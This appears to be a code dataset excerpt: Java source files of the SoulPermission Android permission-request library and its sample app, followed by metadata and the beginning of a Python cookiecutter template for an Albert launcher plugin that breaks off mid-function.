import com.qw.soul.permission.callbcak.CheckRequestPermissionListener;
import com.qw.soul.permission.callbcak.CheckRequestPermissionsListener;
import com.qw.soul.permission.callbcak.CheckStatusCallBack;
import com.qw.soul.permission.callbcak.GoAppDetailCallBack;
import com.qw.soul.permission.callbcak.RequestPermissionListener;
import com.qw.soul.permission.callbcak.SpecialPermissionListener;
import com.qw.soul.permission.checker.CheckerFactory;
import com.qw.soul.permission.debug.PermissionDebug;
import com.qw.soul.permission.request.PermissionConfig;
import com.qw.soul.permission.request.PermissionRequester;
import java.util.LinkedList;
import java.util.List;
import static android.os.Build.VERSION_CODES.KITKAT;
import static android.os.Build.VERSION_CODES.O;
/**
* https://github.com/soulqw/SoulPermission
* @author cd5160866
*/
public class SoulPermission {
private static final String TAG = SoulPermission.class.getSimpleName();
private volatile static SoulPermission instance;
private static Application globalContext;
private volatile static boolean alreadyInit;
private PermissionActivityLifecycle lifecycle;
    /**
     * Get the SoulPermission singleton
     */
public static SoulPermission getInstance() {
if (null == instance) {
synchronized (SoulPermission.class) {
if (instance == null) {
instance = new SoulPermission();
}
}
}
return instance;
}
    /**
     * Enable debug mode
     * Makes log output visible
     * When auto-initialization fails, a toast is shown
     */
public static void setDebug(boolean isDebug) {
PermissionDebug.setDebug(isDebug);
}
    /**
     * Whether to skip the legacy permission check on old systems
     * By default AppOps is used below 6.0; when skipped, every check below 6.0 returns true
     *
     * @param isSkip whether to skip
     */
public static void skipOldRom(boolean isSkip) {
PermissionConfig.skipOldRom = isSkip;
}
    /**
     * init
     * not necessary in most cases
     * invoke it when auto-init fails
     *
     * @see #setDebug(boolean)
     */
public static void init(@NonNull Application application) {
if (alreadyInit) {
PermissionDebug.w(TAG, "already init");
return;
}
alreadyInit = true;
globalContext = application;
getInstance().registerLifecycle(globalContext);
PermissionDebug.d(TAG, "user init");
}
    /**
     * Check a permission
     *
     * @param permission the permission name
     * @return the check result
     * @see #checkPermissions
     */
@CheckResult
    public Permission checkSinglePermission(@NonNull String permission) {
        Permission[] result = checkPermissions(permission);
        if (result.length == 0) {
            return null;
        }
        return result[0];
    }
    /**
     * Check several permissions at once
     *
     * @param permissions the permission names; several can be checked together
     * @return the check results
     */
@CheckResult
public Permission[] checkPermissions(@NonNull String... permissions) {
List<Permission> resultPermissions = new LinkedList<>();
Activity activity = getTopActivity();
if (null == activity) {
            PermissionDebug.w(TAG, "get top activity failed, check your app status");
return new Permission[0];
}
for (String permission : permissions) {
int isGranted = checkPermission(activity, permission)
? PackageManager.PERMISSION_GRANTED
: PackageManager.PERMISSION_DENIED;
            boolean shouldRationale = ActivityCompat.shouldShowRequestPermissionRationale(activity, permission);
resultPermissions.add(new Permission(permission, isGranted, shouldRationale));
}
return PermissionTools.convert(resultPermissions);
}
    /**
     * Check a special permission, e.g. notifications
     *
     * @param special the special-permission enum
     * @return the check result
     * @see Special
     */
public boolean checkSpecialPermission(Special special) {
Activity activity = getTopActivity();
if (null == activity) {
            PermissionDebug.w(TAG, "get top activity failed, check your app status");
return true;
}
return CheckerFactory.create(activity, special).check();
}
    /**
     * Check and request a single permission
     * Before a sensitive operation, check and request the permission first; once granted, continue with the follow-up work
     *
     * @param permissionName the permission name, e.g. Manifest.permission.CALL_PHONE
     * @param listener       the callback invoked after the request
     * @see #checkAndRequestPermissions
     */
@MainThread
public void checkAndRequestPermission(@NonNull final String permissionName, @NonNull final CheckRequestPermissionListener listener) {
checkAndRequestPermissions(Permissions.build(permissionName), new CheckRequestPermissionsListener() {
@Override
public void onAllPermissionOk(Permission[] allPermissions) {
listener.onPermissionOk(allPermissions[0]);
}
@Override
public void onPermissionDenied(Permission[] refusedPermissions) {
listener.onPermissionDenied(refusedPermissions[0]);
}
});
}
    /**
     * Check and request several permissions
     * Before a sensitive operation, check and request the permissions first; once granted, continue with the follow-up work
     *
     * @param permissions the permissions to request, e.g. Permissions.build(Manifest.permission.CALL_PHONE, Manifest.permission.CAMERA)
     * @param listener    the callback invoked after the request
     */
@MainThread
public void checkAndRequestPermissions(@NonNull Permissions permissions, @NonNull final CheckRequestPermissionsListener listener) {
//check permission first
Permission[] checkResult = checkPermissions(permissions.getPermissionsString());
if (checkResult.length == 0) {
PermissionDebug.w(TAG, "bad status ,check your application status");
return;
}
//get refused permissions
final Permission[] refusedPermissionList = filterRefusedPermissions(checkResult);
// all permissions ok
if (refusedPermissionList.length == 0) {
PermissionDebug.d(TAG, "all permissions ok");
listener.onAllPermissionOk(checkResult);
return;
}
//can request runTime permission
if (canRequestRunTimePermission()) {
requestPermissions(Permissions.build(refusedPermissionList), listener);
} else {
PermissionDebug.d(TAG, "some permission refused but can not request");
listener.onPermissionDenied(refusedPermissionList);
}
}
    /**
     * Check and request a special permission
     *
     * @param special  the special permission: system alert window, unknown sources, etc.
     *                 {@link com.qw.soul.permission.bean.Special }
     * @param listener the request callback
     */
@MainThread
public void checkAndRequestPermission(@NonNull Special special, @NonNull SpecialPermissionListener listener) {
boolean permissionResult = checkSpecialPermission(special);
if (permissionResult) {
listener.onGranted(special);
return;
}
int currentOsVersion = Build.VERSION.SDK_INT;
switch (special) {
case UNKNOWN_APP_SOURCES:
if (currentOsVersion < O) {
listener.onDenied(special);
return;
}
break;
case SYSTEM_ALERT:
case NOTIFICATION:
default:
if (currentOsVersion < KITKAT) {
listener.onDenied(special);
return;
}
break;
}
requestSpecialPermission(special, listener);
}
    /**
     * Get the global application context
     */
public Context getContext() {
return globalContext;
}
    /**
     * Provides the usable Activity currently at the top of the stack
     *
     * @return the top Activity in your app
     */
@Nullable
@CheckResult
public Activity getTopActivity() {
Activity result = null;
try {
result = lifecycle.getActivity();
} catch (Exception e) {
if (PermissionDebug.isDebug()) {
PermissionTools.toast(getContext(), e.toString());
Log.e(TAG, e.toString());
}
}
return result;
}
    /**
     * Go to the system permission settings page
     * Fragmentation is too severe, so vendor-specific pages were removed in 1.1.7; this now always jumps to the app detail page
     * Please use the new method instead
     *
     * @see #goApplicationSettings()
     */
@Deprecated
public void goPermissionSettings() {
goApplicationSettings();
}
    /**
     * Jump to the app detail page
     *
     * @param requestCode a custom requestCode so you can handle the result in your own callback
     *                    Deprecated because this method cannot receive onActivityResult inside a Fragment
     * @see #goApplicationSettings(GoAppDetailCallBack)
     */
    @Deprecated
public void goApplicationSettings(int requestCode) {
PermissionTools.jumpAppDetail(getTopActivity(), requestCode);
}
    /**
     * Jump to the app detail page
     *
     * @param callBack pass one if you need a callback when returning to the page
     */
public void goApplicationSettings(@Nullable final GoAppDetailCallBack callBack) {
checkStatusBeforeDoSomething(new CheckStatusCallBack() {
@Override
public void onStatusOk(Activity activity) {
new PermissionRequester(activity)
.goAppDetail(callBack);
}
});
}
public void goApplicationSettings() {
goApplicationSettings(null);
}
void autoInit(Application application) {
if (null != globalContext) {
return;
}
globalContext = application;
registerLifecycle(globalContext);
}
private SoulPermission() {
}
private void registerLifecycle(Application context) {
if (null != lifecycle) {
context.unregisterActivityLifecycleCallbacks(lifecycle);
}
lifecycle = new PermissionActivityLifecycle();
context.registerActivityLifecycleCallbacks(lifecycle);
}
    /**
     * Filter out the refused permissions
     */
private Permission[] filterRefusedPermissions(Permission[] in) {
final List<Permission> out = new LinkedList<>();
for (Permission permission : in) {
boolean isPermissionOk = permission.isGranted();
//add refused permission
if (!isPermissionOk) {
out.add(permission);
}
}
PermissionDebug.d(TAG, "refusedPermissionList.size" + out.size());
return PermissionTools.convert(out);
}
    /**
     * Whether the conditions for requesting runtime permissions are met
     */
private boolean canRequestRunTimePermission() {
return !PermissionTools.isOldPermissionSystem(getTopActivity());
}
private boolean checkPermission(Context context, String permission) {
return CheckerFactory.create(context, permission).check();
}
private void checkStatusBeforeDoSomething(final CheckStatusCallBack callBack) {
//check container status
final Activity activity;
try {
activity = lifecycle.getActivity();
} catch (Exception e) {
//activity status error do not request
if (PermissionDebug.isDebug()) {
PermissionTools.toast(getContext(), e.toString());
Log.e(TAG, e.toString());
}
return;
}
//check MainThread
if (!PermissionTools.assertMainThread()) {
PermissionDebug.w(TAG, "do not request permission in other thread");
new Handler(Looper.getMainLooper()).post(new Runnable() {
@Override
public void run() {
callBack.onStatusOk(activity);
}
});
return;
}
//can do
callBack.onStatusOk(activity);
}
private void requestPermissions(final Permissions permissions, final CheckRequestPermissionsListener listener) {
checkStatusBeforeDoSomething(new CheckStatusCallBack() {
@Override
public void onStatusOk(Activity activity) {
requestRuntimePermission(activity, permissions.getPermissions(), listener);
}
});
}
private void requestRuntimePermission(final Activity activity, final Permission[] permissionsToRequest, final CheckRequestPermissionsListener listener) {
PermissionDebug.d(TAG, "start to request permissions size= " + permissionsToRequest.length);
new PermissionRequester(activity)
.withPermission(permissionsToRequest)
.request(new RequestPermissionListener() {
@Override
public void onPermissionResult(Permission[] permissions) {
//this list contains all the refused permissions after request
List<Permission> refusedListAfterRequest = new LinkedList<>();
for (Permission requestResult : permissions) {
if (!requestResult.isGranted()) {
refusedListAfterRequest.add(requestResult);
}
}
if (refusedListAfterRequest.size() == 0) {
PermissionDebug.d(TAG, "all permission are request ok");
listener.onAllPermissionOk(permissionsToRequest);
} else {
PermissionDebug.d(TAG, "some permission are refused size=" + refusedListAfterRequest.size());
listener.onPermissionDenied(PermissionTools.convert(refusedListAfterRequest));
}
}
});
}
private void requestSpecialPermission(final Special specialPermission, final SpecialPermissionListener listener) {
checkStatusBeforeDoSomething(new CheckStatusCallBack() {
@Override
public void onStatusOk(Activity activity) {
new PermissionRequester(activity)
.withPermission(specialPermission)
.request(listener);
}
});
}
}
<file_sep>package com.qw.sample.guide.fragment;
import android.app.Activity;
import android.content.Intent;
import android.os.Bundle;
import androidx.appcompat.app.AppCompatActivity;
import android.widget.FrameLayout;
/**
* @author cd5160866
* @date 2019-06-11
*/
public class ContainerActivity extends AppCompatActivity {
public static void start(Activity activity, boolean isSupport) {
Intent intent = new Intent(activity, ContainerActivity.class);
intent.putExtra("isSupport", isSupport);
activity.startActivity(intent);
}
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
int contentViewId = 1000;
FrameLayout frameLayout = new FrameLayout(this);
frameLayout.setId(contentViewId);
setContentView(frameLayout);
if (getIntent().getExtras() == null) {
return;
}
boolean isSupport = getIntent().getExtras().getBoolean("isSupport", false);
if (isSupport) {
getSupportFragmentManager()
.beginTransaction()
.replace(contentViewId, new ApiGuideSupportFragment())
.commitNowAllowingStateLoss();
} else {
getFragmentManager().beginTransaction()
.replace(contentViewId, new ApiGuideFragment())
.commitAllowingStateLoss();
}
}
}
<file_sep>package com.qw.soul.permission.checker;
import android.Manifest;
import android.app.AppOpsManager;
import android.content.Context;
import android.os.Binder;
import android.os.Build;
import com.qw.soul.permission.debug.PermissionDebug;
import com.qw.soul.permission.request.PermissionConfig;
import java.lang.reflect.Method;
import static android.os.Build.VERSION_CODES.KITKAT;
/**
* @author cd5160866
*/
class AppOpsChecker implements PermissionChecker {
private static final String TAG = AppOpsChecker.class.getSimpleName();
private Context context;
private String permission;
AppOpsChecker(Context context) {
this(context, null);
}
AppOpsChecker(Context context, String permission) {
this.context = context;
this.permission = permission;
}
    /**
     * Legacy permission-status check via reflection
     * The result may be inaccurate, but if it returns false the permission is definitely not granted
     * Add further cases as needed
     * <p>
     * If no case matches, or an exception occurs, the permission is assumed to be granted
     *
     * @return the check result
     */
@Override
public boolean check() {
if (null == permission) {
return true;
}
if (PermissionConfig.skipOldRom) {
return true;
}
switch (permission) {
case Manifest.permission.READ_CONTACTS:
return checkOp(4);
case Manifest.permission.WRITE_CONTACTS:
return checkOp(5);
case Manifest.permission.CALL_PHONE:
return checkOp(13);
case Manifest.permission.READ_PHONE_STATE:
return checkOp(51);
case Manifest.permission.CAMERA:
return checkOp(26);
case Manifest.permission.READ_EXTERNAL_STORAGE:
return checkOp(59);
case Manifest.permission.WRITE_EXTERNAL_STORAGE:
return checkOp(60);
case Manifest.permission.ACCESS_FINE_LOCATION:
return checkOp(1);
case Manifest.permission.ACCESS_COARSE_LOCATION:
return checkOp(0);
case Manifest.permission.RECORD_AUDIO:
return checkOp(27);
case Manifest.permission.BODY_SENSORS:
return checkOp(56);
case Manifest.permission.READ_CALENDAR:
return checkOp(8);
case Manifest.permission.WRITE_CALENDAR:
return checkOp(9);
case Manifest.permission.SEND_SMS:
return checkOp(20);
case Manifest.permission.READ_SMS:
return checkOp(14);
case Manifest.permission.RECEIVE_SMS:
return checkOp(16);
default:
break;
}
return true;
}
    /**
     * check via reflection
     */
boolean checkOp(int op) {
if (Build.VERSION.SDK_INT < KITKAT) {
PermissionDebug.d(TAG, "4.4 below");
return true;
}
try {
AppOpsManager manager = (AppOpsManager) context.getSystemService(Context.APP_OPS_SERVICE);
Method method = AppOpsManager.class.getDeclaredMethod("checkOp", int.class, int.class, String.class);
return 0 == (int) method.invoke(manager, op, Binder.getCallingUid(), context.getPackageName());
} catch (Exception e) {
PermissionDebug.w(TAG, e.toString());
e.printStackTrace();
}
return true;
}
}
<file_sep>package com.qw.sample.guide.fragment;
import android.os.Bundle;
import androidx.annotation.NonNull;
import androidx.annotation.Nullable;
import androidx.fragment.app.Fragment;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.widget.Toast;
import com.qw.sample.R;
import com.qw.sample.utils.ApiGuideUtils;
public class ApiGuideSupportFragment extends Fragment {
private View root;
@Nullable
@Override
public View onCreateView(@NonNull LayoutInflater inflater, @Nullable final ViewGroup container, @Nullable Bundle savedInstanceState) {
Toast.makeText(getActivity(), "use permission Based on SupportFragment", Toast.LENGTH_SHORT).show();
root = LayoutInflater.from(container.getContext()).inflate(R.layout.layout_api_guide, container, false);
findViewById(R.id.checkSinglePermission)
.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
ApiGuideUtils.checkSinglePermission(v);
}
});
findViewById(R.id.requestSinglePermission)
.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
ApiGuideUtils.requestSinglePermission(v);
}
});
findViewById(R.id.requestPermissions)
.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
ApiGuideUtils.requestPermissions(v);
}
});
findViewById(R.id.requestSinglePermissionWithRationale)
.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
ApiGuideUtils.requestSinglePermissionWithRationale(v);
}
});
findViewById(R.id.checkNotification)
.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
ApiGuideUtils.checkNotification(v);
}
});
findViewById(R.id.checkAndRequestNotification)
.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
ApiGuideUtils.checkAndRequestNotification(v);
}
});
findViewById(R.id.checkAndRequestSystemAlert)
.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
ApiGuideUtils.checkAndRequestSystemAlert(v);
}
});
findViewById(R.id.checkAndRequestUnKnownSource)
.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
ApiGuideUtils.checkAndRequestUnKnownSource(v);
}
});
findViewById(R.id.checkAndRequestWriteSystemSettings)
.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
ApiGuideUtils.checkAndRequestWriteSystemSettings(v);
}
});
findViewById(R.id.goApplicationSettings)
.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
ApiGuideUtils.goApplicationSettings(v);
}
});
findViewById(R.id.getTopActivity)
.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
ApiGuideUtils.getTopActivity(v);
}
});
return root;
}
private <T extends View> T findViewById(int id) {
return root.findViewById(id);
}
}
<file_sep>package com.qw.sample.guide.fragment;
import android.Manifest;
import android.graphics.Color;
import android.os.Bundle;
import androidx.annotation.NonNull;
import androidx.annotation.Nullable;
import androidx.fragment.app.Fragment;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.widget.Toast;
import com.qw.soul.permission.SoulPermission;
import com.qw.soul.permission.adapter.SimplePermissionAdapter;
import com.qw.soul.permission.bean.Permission;
public class PagerItemFragment extends Fragment {
public static PagerItemFragment get(int color) {
PagerItemFragment fragment = new PagerItemFragment();
Bundle bundle = new Bundle();
bundle.putInt("Color", color);
fragment.setArguments(bundle);
return fragment;
}
@Nullable
@Override
public View onCreateView(@NonNull LayoutInflater inflater, @Nullable final ViewGroup container, @Nullable Bundle savedInstanceState) {
View view = new View(container.getContext());
int color = getArguments().getInt("Color");
view.setBackgroundColor(color);
if (color == Color.RED) {
SoulPermission.getInstance().checkAndRequestPermission(Manifest.permission.BODY_SENSORS, new SimplePermissionAdapter() {
@Override
public void onPermissionOk(Permission permission) {
Toast.makeText(container.getContext(), "sensor permission ok", Toast.LENGTH_SHORT).show();
}
@Override
public void onPermissionDenied(Permission permission) {
Toast.makeText(container.getContext(), "sensor permission denied", Toast.LENGTH_SHORT).show();
}
});
}
return view;
}
}
<file_sep>package com.qw.soul.permission.exception;
/**
* @author cd5160866
*/
public class ContainerStatusException extends IllegalStateException {
public ContainerStatusException() {
super(" activity did not existence, check your app status before use soulPermission");
}
}
<file_sep>package com.qw.sample.adapter;
import android.app.Activity;
import android.content.DialogInterface;
import androidx.appcompat.app.AlertDialog;
import com.qw.soul.permission.SoulPermission;
import com.qw.soul.permission.bean.Permission;
import com.qw.soul.permission.callbcak.CheckRequestPermissionListener;
/**
* @author cd5160866
*/
public abstract class CheckPermissionAdapter implements CheckRequestPermissionListener {
@Override
public void onPermissionDenied(Permission permission) {
        // SoulPermission provides the top Activity on the stack
Activity activity = SoulPermission.getInstance().getTopActivity();
if (null == activity) {
return;
}
String permissionDesc = permission.getPermissionNameDesc();
new AlertDialog.Builder(activity)
                .setTitle("Notice")
                .setMessage(permissionDesc + " permission error. Please go to Settings -> Permission management and enable " + permissionDesc + ".")
                .setPositiveButton("Go to settings", new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialogInterface, int i) {
                        // go to the settings page
SoulPermission.getInstance().goPermissionSettings();
}
}).create().show();
}
}
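/*
 * A minimal usage sketch (hypothetical call site): onPermissionDenied is already handled
 * above, so a caller only needs to implement onPermissionOk, e.g.
 *
 * SoulPermission.getInstance().checkAndRequestPermission(
 *         Manifest.permission.CAMERA,
 *         new CheckPermissionAdapter() {
 *             @Override
 *             public void onPermissionOk(Permission permission) {
 *                 // the permission is granted - run the camera operation here
 *             }
 *         });
 */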
<file_sep>package com.qw.sample.utils;
import android.Manifest;
import android.app.Activity;
import android.content.Intent;
import com.google.android.material.snackbar.Snackbar;
import android.view.View;
import com.qw.soul.permission.SoulPermission;
import com.qw.soul.permission.bean.Permission;
import com.qw.soul.permission.bean.Permissions;
import com.qw.soul.permission.bean.Special;
import com.qw.soul.permission.callbcak.CheckRequestPermissionListener;
import com.qw.soul.permission.callbcak.CheckRequestPermissionsListener;
import com.qw.soul.permission.callbcak.GoAppDetailCallBack;
import com.qw.soul.permission.callbcak.SpecialPermissionListener;
/**
* @author cd5160866
*/
public class ApiGuideUtils {
public static void checkSinglePermission(View view) {
//you can also use checkPermissions() for a series of permissions
Permission checkResult = SoulPermission.getInstance().checkSinglePermission(Manifest.permission.ACCESS_FINE_LOCATION);
Utils.showMessage(view, checkResult.toString());
}
public static void requestSinglePermission(final View view) {
SoulPermission.getInstance().checkAndRequestPermission(Manifest.permission.ACCESS_FINE_LOCATION,
//if you want do noting or no need all the callbacks you may use SimplePermissionAdapter instead
new CheckRequestPermissionListener() {
@Override
public void onPermissionOk(Permission permission) {
Utils.showMessage(view, permission.toString() + "\n is ok , you can do your operations");
}
@Override
public void onPermissionDenied(Permission permission) {
Utils.showMessage(view, permission.toString() + " \n is refused you can not do next things");
}
});
}
public static void requestPermissions(final View view) {
SoulPermission.getInstance().checkAndRequestPermissions(
Permissions.build(Manifest.permission.CAMERA, Manifest.permission.WRITE_EXTERNAL_STORAGE),
//if you want do noting or no need all the callbacks you may use SimplePermissionsAdapter instead
new CheckRequestPermissionsListener() {
@Override
public void onAllPermissionOk(Permission[] allPermissions) {
Utils.showMessage(view, allPermissions.length + "permissions is ok" + " \n you can do your operations");
}
@Override
public void onPermissionDenied(Permission[] refusedPermissions) {
Utils.showMessage(view, refusedPermissions[0].toString() + " \n is refused you can not do next things");
}
});
}
public static void requestSinglePermissionWithRationale(final View view) {
SoulPermission.getInstance().checkAndRequestPermission(Manifest.permission.READ_CONTACTS,
new CheckRequestPermissionListener() {
@Override
public void onPermissionOk(Permission permission) {
Utils.showMessage(view, permission.toString() + "\n is ok , you can do your operations");
}
@Override
public void onPermissionDenied(Permission permission) {
// see CheckPermissionWithRationaleAdapter
if (permission.shouldRationale()) {
Utils.showMessage(view, permission.toString() + " \n you should show a explain for user then retry ");
} else {
Utils.showMessage(view, permission.toString() + " \n is refused you can not do next things");
}
}
});
}
public static void checkNotification(View view) {
boolean checkResult = SoulPermission.getInstance().checkSpecialPermission(Special.NOTIFICATION);
Utils.showMessage(view, checkResult ? "Notification is enable" :
"Notification is disable \n you may invoke checkAndRequestPermission and enable notification");
}
public static void checkAndRequestNotification(final View view) {
//if you want do noting or no need all the callbacks you may use SimpleSpecialPermissionAdapter instead
SoulPermission.getInstance().checkAndRequestPermission(Special.NOTIFICATION, new SpecialPermissionListener() {
@Override
public void onGranted(Special permission) {
Utils.showMessage(view, "Notification is enable now ");
}
@Override
public void onDenied(Special permission) {
Snackbar.make(view, "Notification is disable yet ", Snackbar.LENGTH_LONG)
.setAction("retry", new View.OnClickListener() {
@Override
public void onClick(View v) {
checkAndRequestNotification(v);
}
}).show();
}
});
}
public static void checkAndRequestSystemAlert(final View view) {
//if you want do noting or no need all the callbacks you may use SimpleSpecialPermissionAdapter instead
SoulPermission.getInstance().checkAndRequestPermission(Special.SYSTEM_ALERT, new SpecialPermissionListener() {
@Override
public void onGranted(Special permission) {
Utils.showMessage(view, "System Alert is enable now ");
}
@Override
public void onDenied(Special permission) {
Utils.showMessage(view, "System Alert is disable yet ");
}
});
}
public static void checkAndRequestUnKnownSource(final View view) {
//if you want do noting or no need all the callbacks you may use SimpleSpecialPermissionAdapter instead
SoulPermission.getInstance().checkAndRequestPermission(Special.UNKNOWN_APP_SOURCES, new SpecialPermissionListener() {
@Override
public void onGranted(Special permission) {
Utils.showMessage(view, "install unKnown app is enable now ");
}
@Override
public void onDenied(Special permission) {
Utils.showMessage(view, "install unKnown app is disable yet");
}
});
}
public static void checkAndRequestWriteSystemSettings(final View view) {
//if you want do noting or no need all the callbacks you may use SimpleSpecialPermissionAdapter instead
SoulPermission.getInstance().checkAndRequestPermission(Special.WRITE_SETTINGS, new SpecialPermissionListener() {
@Override
public void onGranted(Special permission) {
Utils.showMessage(view, "install unKnown app is enable now ");
}
@Override
public void onDenied(Special permission) {
Utils.showMessage(view, "install unKnown app is disable yet");
}
});
}
public static void goApplicationSettings(final View view) {
SoulPermission.getInstance().goApplicationSettings(new GoAppDetailCallBack() {
@Override
public void onBackFromAppDetail(Intent data) {
//if you need to know when back from app detail
Utils.showMessage(view, "back from go appDetail");
}
});
}
public static void getTopActivity(View view) {
Activity activity = SoulPermission.getInstance().getTopActivity();
if (null != activity) {
Utils.showMessage(view, activity.getClass().getSimpleName() + " " + activity.hashCode());
}
}
}
<file_sep>package com.qw.soul.permission.request;
import android.app.Activity;
import android.app.Fragment;
import android.os.Build;
import androidx.fragment.app.FragmentActivity;
import androidx.fragment.app.FragmentManager;
import com.qw.soul.permission.debug.PermissionDebug;
import com.qw.soul.permission.request.fragment.PermissionFragment;
import com.qw.soul.permission.request.fragment.PermissionSupportFragment;
import java.lang.reflect.Field;
import java.util.List;
/**
* @author cd5160866
*/
class PermissionFragmentFactory {
private static final String TAG = PermissionFragmentFactory.class.getSimpleName();
private static final String FRAGMENT_TAG = "permission_fragment_tag";
static IPermissionActions create(Activity activity) {
IPermissionActions action;
if (activity instanceof FragmentActivity) {
FragmentManager supportFragmentManager = getSupportFragmentManager((FragmentActivity) activity);
PermissionSupportFragment permissionSupportFragment = (PermissionSupportFragment) supportFragmentManager.findFragmentByTag(FRAGMENT_TAG);
if (null == permissionSupportFragment) {
permissionSupportFragment = new PermissionSupportFragment();
supportFragmentManager.beginTransaction()
.add(permissionSupportFragment, FRAGMENT_TAG)
.commitNowAllowingStateLoss();
}
action = permissionSupportFragment;
} else {
android.app.FragmentManager fragmentManager = getFragmentManager(activity);
PermissionFragment permissionFragment = (PermissionFragment) fragmentManager.findFragmentByTag(FRAGMENT_TAG);
if (null == permissionFragment) {
permissionFragment = new PermissionFragment();
fragmentManager.beginTransaction()
.add(permissionFragment, FRAGMENT_TAG)
.commitAllowingStateLoss();
//make it commit like commitNow
fragmentManager.executePendingTransactions();
}
action = permissionFragment;
}
return action;
}
private static FragmentManager getSupportFragmentManager(FragmentActivity activity) {
FragmentManager fragmentManager = activity.getSupportFragmentManager();
        // some specific ROMs will provide a null list
boolean childAvailable = null != fragmentManager.getFragments();
if (childAvailable && fragmentManager.getFragments().size() > 0
&& null != fragmentManager.getFragments().get(0)) {
return fragmentManager.getFragments().get(0).getChildFragmentManager();
}
return fragmentManager;
}
private static android.app.FragmentManager getFragmentManager(Activity activity) {
android.app.FragmentManager fragmentManager = activity.getFragmentManager();
if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
if (null != fragmentManager.getFragments()
&& fragmentManager.getFragments().size() > 0
&& null != fragmentManager.getFragments().get(0)) {
return fragmentManager.getFragments().get(0).getChildFragmentManager();
}
} else {
try {
Field fragmentsField = Class.forName("android.app.FragmentManagerImpl").getDeclaredField("mAdded");
fragmentsField.setAccessible(true);
List<Fragment> fragmentList = (List<Fragment>) fragmentsField.get(fragmentManager);
if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.JELLY_BEAN_MR1
&& null != fragmentList
&& fragmentList.size() > 0
&& null != fragmentList.get(0)) {
PermissionDebug.d(TAG, "reflect get child fragmentManager success");
return fragmentList.get(0).getChildFragmentManager();
}
} catch (Exception e) {
PermissionDebug.w(TAG, "try to get childFragmentManager failed " + e.toString());
e.printStackTrace();
}
}
return fragmentManager;
}
}
|
b478a1bfe509b826e8982d88f01e40ee7b7d6bfd
|
[
"Markdown",
"Java",
"Gradle"
] | 20
|
Java
|
soulqw/SoulPermission
|
1a5c1fa88e043282e153a9a8c0d5e8c04b71633c
|
6630bd5b6d64ba45715a2a922e0393e79d4170ff
|
refs/heads/master
|
<file_sep>"""{{ cookiecutter.plugin_short_description }}."""
from pathlib import Path
from typing import List, Dict
import os
import shutil
import subprocess
import sys
import time
import traceback
from fuzzywuzzy import process
{%- if cookiecutter.use_notifications == 'y' %}
from gi.repository import GdkPixbuf, Notify
{%- endif %}
import albert as v0
__title__ = "{{ cookiecutter.plugin_short_description }}"
__version__ = "{{ cookiecutter.albert_version }}"
__triggers__ = "{{ cookiecutter.trigger }} "
__authors__ = "{{ cookiecutter.author }}"
__homepage__ = "{{ cookiecutter.repo_base_url }}/{{ cookiecutter.plugin_name }}"
__exec_deps__ = []
__py_deps__ = []
icon_path = str(Path(__file__).parent / "{{ cookiecutter.plugin_name }}")
cache_path = Path(v0.cacheLocation()) / "{{ cookiecutter.plugin_name }}"
config_path = Path(v0.configLocation()) / "{{ cookiecutter.plugin_name }}"
data_path = Path(v0.dataLocation()) / "{{ cookiecutter.plugin_name }}"
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
{%- if cookiecutter.include_file_backed_var == 'y' %}
# FileBackedVar class -------------------------------------------------------------------------
class FileBackedVar:
def __init__(self, varname, convert_fn=str, init_val=None):
self._fpath = config_path / varname
self._convert_fn = convert_fn
if init_val:
with open(self._fpath, "w") as f:
f.write(str(init_val))
else:
self._fpath.touch()
def get(self):
with open(self._fpath, "r") as f:
return self._convert_fn(f.read().strip())
def set(self, val):
with open(self._fpath, "w") as f:
return f.write(str(val))
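# A minimal usage sketch (the variable name is hypothetical): persist a counter
# across plugin reloads.
#   counter = FileBackedVar("my_counter", convert_fn=int, init_val=0)
#   counter.set(counter.get() + 1)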
{%- endif %}
{%- if cookiecutter.include_keystroke_monitor == 'y' %}
# KeystrokeMonitor class ----------------------------------------------------------------------
class KeystrokeMonitor:
def __init__(self):
        super().__init__()
self.thres = 0.3 # s
self.prev_time = time.time()
self.curr_time = time.time()
def report(self):
self.prev_time = time.time()
self.curr_time = time.time()
self.report = self.report_after_first
def report_after_first(self):
# update prev, curr time
self.prev_time = self.curr_time
self.curr_time = time.time()
def triggered(self) -> bool:
return self.curr_time - self.prev_time > self.thres
def reset(self) -> None:
self.report = self.report_after_first
# Do not flood the web server with queries, otherwise it may block your IP.
keys_monitor = KeystrokeMonitor()
{%- endif %}
# plugin main functions -----------------------------------------------------------------------
def initialize():
"""Called when the extension is loaded (ticked in the settings) - blocking."""
pass
def finalize():
pass
def handleQuery(query) -> list:
"""Hook that is called by albert with *every new keypress*.""" # noqa
results = []
if query.isTriggered:
try:
query.disableSort()
results_setup = setup(query)
if results_setup:
return results_setup
query_str = query.string
{%- if cookiecutter.include_keystroke_monitor == 'y' %}
if len(query_str) < 2:
keys_monitor.reset()
return results
keys_monitor.report()
if keys_monitor.triggered():
# modify this...
results.append(get_as_item())
{%- else %}
# modify this...
results.append(get_as_item())
{%- endif %}
except Exception: # user to report error
v0.critical(traceback.format_exc())
results.insert(
0,
v0.Item(
id=__title__,
icon=icon_path,
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
v0.ClipAction(
f"Copy error - report it to {__homepage__[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
return results
# supplementary functions ---------------------------------------------------------------------
{%- if cookiecutter.use_notifications == 'y' %}
def notify(
    msg: str, app_name: str = __title__, image=str(icon_path),
):
Notify.init(app_name)
n = Notify.Notification.new(app_name, msg, image)
